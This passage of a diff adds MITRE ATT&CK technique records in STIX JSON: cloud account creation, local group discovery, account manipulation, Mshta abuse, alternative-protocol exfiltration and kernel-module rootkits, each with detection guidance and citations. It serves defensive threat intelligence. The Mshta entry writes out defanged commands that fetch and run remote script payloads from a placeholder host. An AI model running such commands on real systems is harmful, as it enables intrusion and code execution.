"mitre-attack", + "url": "https://attack.mitre.org/techniques/T1199", + "external_id": "T1199" + }, + { + "source_name": "CISA IT Service Providers", + "description": "CISA. (n.d.). APTs Targeting IT Service Provider Customers. Retrieved November 16, 2020.", + "url": "https://us-cert.cisa.gov/APTs-Targeting-IT-Service-Provider-Customers" + }, + { + "source_name": "Office 365 Delegated Administration", + "description": "Microsoft. (n.d.). Partners: Offer delegated administration. Retrieved May 27, 2022.", + "url": "https://support.microsoft.com/en-us/topic/partners-offer-delegated-administration-26530dc0-ebba-415b-86b1-b55bc06b073e?ui=en-us&rs=en-us&ad=us" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-03-28T16:14:28.678Z", + "name": "Cloud Account", + "description": "Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)\n\nIn addition to user accounts, cloud accounts may be associated with services. Cloud providers handle the concept of service accounts in different ways. In Azure, service accounts include service principals and managed identities, which can be linked to various resources such as OAuth applications, serverless functions, and virtual machines in order to grant those resources permissions to perform various activities in the environment.(Citation: Microsoft Entra ID Service Principals) In GCP, service accounts can also be linked to specific resources, as well as be impersonated by other accounts for [Temporary Elevated Cloud Access](https://attack.mitre.org/techniques/T1548/005).(Citation: GCP Service Accounts) While AWS has no specific concept of service accounts, resources can be directly granted permission to assume roles.(Citation: AWS Instance Profiles)(Citation: AWS Lambda Execution Role)\n\nAdversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection.\n\nOnce an adversary has created a cloud account, they can then manipulate that account to ensure persistence and allow access to additional resources - for example, by adding [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) or assigning [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Praetorian", + "Microsoft Threat Intelligence Center (MSTIC)" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Collect usage logs from cloud user and administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Azure AD", + "Office 365", + "IaaS", + "Google Workspace", + "SaaS" + ], + "x_mitre_version": "1.5", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--a009cb25-4801-4116-9105-80a91cf15c1b", + "created": "2020-01-29T17:32:30.711Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1136/003", + "external_id": "T1136.003" + }, + { + "source_name": "Microsoft O365 Admin Roles", + "description": "Ako-Adjei, K., Dickhaus, M., Baumgartner, P., Faigel, D., et. al.. (2019, October 8). About admin roles. Retrieved October 18, 2019.", + "url": "https://docs.microsoft.com/en-us/office365/admin/add-users/about-admin-roles?view=o365-worldwide" + }, + { + "source_name": "AWS Create IAM User", + "description": "AWS. (n.d.). Creating an IAM User in Your AWS Account. Retrieved January 29, 2020.", + "url": "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users_create.html" + }, + { + "source_name": "AWS Lambda Execution Role", + "description": "AWS. (n.d.). Lambda execution role. Retrieved February 28, 2024.", + "url": "https://docs.aws.amazon.com/lambda/latest/dg/lambda-intro-execution-role.html" + }, + { + "source_name": "AWS Instance Profiles", + "description": "AWS. (n.d.). Using instance profiles. Retrieved February 28, 2024.", + "url": "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_switch-role-ec2_instance-profiles.html" + }, + { + "source_name": "GCP Create Cloud Identity Users", + "description": "Google. (n.d.). Create Cloud Identity user accounts. Retrieved January 29, 2020.", + "url": "https://support.google.com/cloudidentity/answer/7332836?hl=en&ref_topic=7558554" + }, + { + "source_name": "GCP Service Accounts", + "description": "Google. (n.d.). Service Accounts Overview. Retrieved February 28, 2024.", + "url": "https://cloud.google.com/iam/docs/service-account-overview" + }, + { + "source_name": "Microsoft Azure AD Users", + "description": "Microsoft. (2019, November 11). Add or delete users using Azure Active Directory. Retrieved January 30, 2020.", + "url": "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/add-users-azure-active-directory" + }, + { + "source_name": "Microsoft Entra ID Service Principals", + "description": "Microsoft. (2023, December 15). Application and service principal objects in Microsoft Entra ID. Retrieved February 28, 2024.", + "url": "https://learn.microsoft.com/en-us/entra/identity-platform/app-objects-and-service-principals?tabs=browser" + }, + { + "source_name": "Microsoft Support O365 Add Another Admin, October 2019", + "description": "Microsoft. (n.d.). Add Another Admin. Retrieved October 18, 2019.", + "url": "https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Local Groups", + "description": "Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n\nCommands such as net localgroup of the [Net](https://attack.mitre.org/software/S0039) utility, dscl . -list /Groups on macOS, and groups on Linux can list local groups.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Harshal Tupsamudre, Qualys", + "Miriam Wiesner, @miriamxyra, Microsoft Security" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--a01bf75f-00b2-4568-a58f-565ff9bf202b", + "created": "2020-03-12T19:29:21.013Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1069/001", + "external_id": "T1069.001" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "LC_MAIN Hijacking", + "description": "**This technique has been deprecated and should no longer be used.**\n\nAs of OS X 10.8, mach-O binaries introduced a new header called LC_MAIN that points to the binary’s entry point for execution. Previously, there were two headers to achieve this same effect: LC_THREAD and LC_UNIXTHREAD (Citation: Prolific OSX Malware History). The entry point for a binary can be hijacked so that initial execution flows to a malicious addition (either another section or a code cave) and then goes back to the initial entry point so that the victim doesn’t know anything was different (Citation: Methods of Mac Malware Persistence). By modifying a binary in this way, application whitelisting can be bypassed because the file name or application path is still the same.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": true, + "x_mitre_detection": "Determining the original entry point for a binary is difficult, but checksum and signature verification is very possible. Modifying the LC_MAIN entry point or adding in an additional LC_MAIN entry point invalidates the signature for the file and can be detected. Collect running process information and compare against known applications to look for suspicious behavior.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "2.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Application whitelisting", + "Process whitelisting", + "Whitelisting by file name or path" + ], + "x_mitre_permissions_required": [ + "User", + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--a0a189c8-d3bd-4991-bf6f-153d185ee373", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1149", + "external_id": "T1149" + }, + { + "source_name": "Prolific OSX Malware History", + "description": "Bit9 + Carbon Black Threat Research Team. (2015). 2015: The Most Prolific Year in History for OS X Malware. Retrieved July 8, 2017.", + "url": "https://assets.documentcloud.org/documents/2459197/bit9-carbon-black-threat-research-report-2015.pdf" + }, + { + "source_name": "Methods of Mac Malware Persistence", + "description": "Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.", + "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-18T22:48:33.286Z", + "name": "Search Open Websites/Domains", + "description": "Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)\n\nAdversaries may search in different online sites depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Phishing](https://attack.mitre.org/techniques/T1566)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365", + "created": "2020-10-02T16:48:04.509Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1593", + "external_id": "T1593" + }, + { + "source_name": "SecurityTrails Google Hacking", + "description": "Borges, E. (2019, March 5). Exploring Google Hacking Techniques. Retrieved October 20, 2020.", + "url": "https://securitytrails.com/blog/google-hacking-techniques" + }, + { + "source_name": "Cyware Social Media", + "description": "Cyware Hacker News. (2019, October 2). How Hackers Exploit Social Media To Break Into Your Company. Retrieved October 20, 2020.", + "url": "https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e" + }, + { + "source_name": "ExploitDB GoogleHacking", + "description": "Offensive Security. (n.d.). Google Hacking Database. Retrieved October 23, 2020.", + "url": "https://www.exploit-db.com/google-hacking-database" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-01-16T22:24:38.234Z", + "name": "Account Manipulation", + "description": "Adversaries may manipulate accounts to maintain and/or elevate access to victim systems. Account manipulation may consist of any action that preserves or modifies adversary access to a compromised account, such as modifying credentials or permission groups.(Citation: FireEye SMOKEDHAM June 2021) These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. \n\nIn order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. However, account manipulation may also lead to privilege escalation where modifications grant access to additional roles, permissions, or higher-privileged [Valid Accounts](https://attack.mitre.org/techniques/T1078).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Jannie Li, Microsoft Threat Intelligence Center (MSTIC)", + "Praetorian", + "Tim MalcomVetter", + "Wojciech Lesicki", + "Arad Inbar, Fidelis Security" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Collect events that correlate with changes to account objects and/or permissions on systems and the domain, such as event IDs 4738, 4728 and 4670.(Citation: Microsoft User Modified Event)(Citation: Microsoft Security Event 4670)(Citation: Microsoft Security Event 4670) Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ(Citation: InsiderThreat ChangeNTLM July 2017) or that include additional flags such as changing a password without knowledge of the old password.(Citation: GitHub Mimikatz Issue 92 June 2017)\n\nMonitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity.\n\nMonitor for unusual permissions changes that may indicate excessively broad permissions being granted to compromised accounts. However, account manipulation may also lead to privilege escalation where modifications grant access to additional roles, permissions, or higher-privileged [Valid Accounts](https://attack.mitre.org/techniques/T1078)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Azure AD", + "Office 365", + "IaaS", + "Linux", + "macOS", + "Google Workspace", + "SaaS", + "Network", + "Containers" + ], + "x_mitre_version": "2.6", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27", + "created": "2017-05-31T21:31:12.196Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1098", + "external_id": "T1098" + }, + { + "source_name": "FireEye SMOKEDHAM June 2021", + "description": "FireEye. (2021, June 16). Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise. Retrieved September 22, 2021.", + "url": "https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html" + }, + { + "source_name": "Microsoft Security Event 4670", + "description": "Franklin Smith, R. (n.d.). Windows Security Log Event ID 4670. Retrieved November 4, 2019.", + "url": "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4670" + }, + { + "source_name": "Microsoft User Modified Event", + "description": "Lich, B., Miroshnikov, A. (2017, April 5). 4738(S): A user account was changed. Retrieved June 30, 2017.", + "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738" + }, + { + "source_name": "InsiderThreat ChangeNTLM July 2017", + "description": "Warren, J. (2017, July 11). Manipulating User Passwords with Mimikatz. Retrieved December 4, 2017.", + "url": "https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM" + }, + { + "source_name": "GitHub Mimikatz Issue 92 June 2017", + "description": "Warren, J. (2017, June 22). lsadump::changentlm and lsadump::setntlm work, but generate Windows events #92. Retrieved December 4, 2017.", + "url": "https://github.com/gentilkiwi/mimikatz/issues/92" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-24T14:00:00.188Z", + "name": "Mshta", + "description": "Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension .hta. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)\n\nAdversaries can use mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017) \n\nFiles may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute(\"GetObject(\"\"script:https[:]//webserver/payload[.]sct\"\")\"))\n\nThey may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta\n\nMshta.exe can be used to bypass application whitelisting solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Ricardo Dias", + "Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank" + ], + "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of mshta.exe. Look for mshta.exe executing raw or obfuscated script within the command-line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the binary being executed.\n\nMonitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Application whitelisting", + "Digital Certificate Validation" + ], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--a127c32c-cbb0-4f9d-be07-881a792408ec", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1170", + "external_id": "T1170" + }, + { + "source_name": "Wikipedia HTML Application", + "description": "Wikipedia. (2017, October 14). HTML Application. Retrieved October 27, 2017.", + "url": "https://en.wikipedia.org/wiki/HTML_Application" + }, + { + "source_name": "MSDN HTML Applications", + "description": "Microsoft. (n.d.). HTML Applications. Retrieved October 27, 2017.", + "url": "https://msdn.microsoft.com/library/ms536471.aspx" + }, + { + "source_name": "Cylance Dust Storm", + "description": "Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021.", + "url": "https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf" + }, + { + "source_name": "Red Canary HTA Abuse Part Deux", + "description": "McCammon, K. (2015, August 14). Microsoft HTML Application (HTA) Abuse, Part Deux. Retrieved October 27, 2017.", + "url": "https://www.redcanary.com/blog/microsoft-html-application-hta-abuse-part-deux/" + }, + { + "source_name": "FireEye Attacks Leveraging HTA", + "description": "Berry, A., Galang, L., Jiang, G., Leathery, J., Mohandas, R. (2017, April 11). CVE-2017-0199: In the Wild Attacks Leveraging HTA Handler. Retrieved October 27, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html" + }, + { + "source_name": "Airbus Security Kovter Analysis", + "description": "Dove, A. (2016, March 23). Fileless Malware – A Behavioural Analysis Of Kovter Persistence. Retrieved December 5, 2017.", + "url": "https://airbus-cyber-security.com/fileless-malware-behavioural-analysis-kovter-persistence/" + }, + { + "source_name": "FireEye FIN7 April 2017", + "description": "Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html" + }, + { + "source_name": "LOLBAS Mshta", + "description": "LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019.", + "url": "https://lolbas-project.github.io/lolbas/Binaries/Mshta/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Exfiltration Over Alternative Protocol", + "description": "Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nAlternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Adversaries may also opt to encrypt and/or obfuscate these alternate channels. \n\n[Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) can be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB or FTP.(Citation: Palo Alto OilRig Oct 2016) On macOS and Linux curl may be used to invoke protocols such as HTTP/S or FTP/S to exfiltrate data from a system.(Citation: 20 macOS Common Tools and Techniques)\n\nMany IaaS and SaaS platforms (such as Microsoft Exchange, Microsoft SharePoint, GitHub, and AWS S3) support the direct download of files, emails, source code, and other sensitive information via the web console or [Cloud API](https://attack.mitre.org/techniques/T1059/009).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "exfiltration" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "William Cain", + "Alfredo Abarca" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Office 365", + "SaaS", + "IaaS", + "Google Workspace", + "Network" + ], + "x_mitre_version": "1.4", + "x_mitre_data_sources": [], + "x_mitre_network_requirements": false, + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776", + "created": "2017-05-31T21:30:44.720Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1048", + "external_id": "T1048" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + }, + { + "source_name": "Palo Alto OilRig Oct 2016", + "description": "Grunzweig, J. and Falcone, R.. (2016, October 4). OilRig Malware Campaign Updates Toolset and Expands Targets. Retrieved May 3, 2017.", + "url": "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/" + }, + { + "source_name": "20 macOS Common Tools and Techniques", + "description": "Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.", + "url": "https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Kernel Modules and Extensions", + "description": "Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) \n\nWhen used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)\n\nKernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload and kextunload commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)\n\nSince macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as \"Legacy System Extensions\" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)\n\nAdversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Wayne Silva, F-Secure Countercept", + "Anastasios Pingios", + "Jeremy Galloway", + "Red Canary", + "Eric Kaiser @ideologysec" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe, insmod, lsmod, rmmod, or modinfo (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules and have had the extension .ko (\"kernel object\") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)\n\nAdversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r) On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)\n\nOn macOS, monitor for execution of kextload commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)\n", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS", + "Linux" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "root" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6", + "created": "2020-01-24T17:42:23.339Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1547/006", + "external_id": "T1547.006" + }, + { + "source_name": "Apple Developer Configuration Profile", + "description": "Apple. (2019, May 3). Configuration Profile Reference. Retrieved September 23, 2021.", + "url": "https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf" + }, + { + "source_name": "Apple Kernel Extension Deprecation", + "description": "Apple. (n.d.). Deprecated Kernel Extensions and System Extension Alternatives. Retrieved November 4, 2020.", + "url": "https://developer.apple.com/support/kernel-extensions/" + }, + { + "source_name": "System and kernel extensions in macOS", + "description": "Apple. (n.d.). System and kernel extensions in macOS. Retrieved March 31, 2022.", + "url": "https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web" + }, + { + "source_name": "GitHub Reptile", + "description": "Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. 